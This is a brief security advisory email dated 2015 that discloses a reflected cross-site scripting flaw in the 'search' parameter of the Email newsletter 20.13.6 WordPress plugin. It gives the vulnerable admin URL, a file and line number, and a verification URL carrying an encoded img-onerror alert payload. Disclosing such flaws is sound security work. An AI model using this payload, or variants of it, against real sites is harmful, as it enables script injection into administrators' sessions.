Subject: Cross Site Scripting (XSS) in Email newsletter 20.13.6

Date: Mon, 10 Aug 2015 16:59:32 +0200

Hello,

Plugin: Email newsletter 20.13.6 https://wordpress.org/plugins/email-newsletter/

1. Cross Site Scripting (XSS) (page=view-subscriber)

Authenticated administrators can inject arbitrary html/javascript code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/admin.php?page=view-subscriber&search=[xss]

Vulnerable parameter: search

Example PHP callstack:

/email-newsletter/subscriber/view-subscriber-show.php:246

Verification:

http://localhost/wp-admin/admin.php?page=view-subscriber&search=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

--

Pozdrawiam,
Marcin Probola,